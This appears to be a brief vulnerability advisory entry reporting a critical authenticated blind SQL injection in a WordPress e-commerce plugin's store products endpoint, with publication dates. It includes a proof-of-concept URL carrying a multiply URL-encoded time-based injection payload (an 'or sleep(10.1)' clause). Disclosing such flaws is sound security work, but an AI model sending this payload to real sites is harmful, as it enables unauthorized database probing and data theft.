The plugin was reported to be affected by a critical Authenticated Blind SQL Injection vulnerability.
http://www.example.com/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][taxonomy]=a%252522%252529%252520or%252520sleep%25252810.1%252529%252523
2021-07-15 (about 1 years ago)
2021-07-15 (about 1 years ago)
2023-01-23 (about 7 days ago)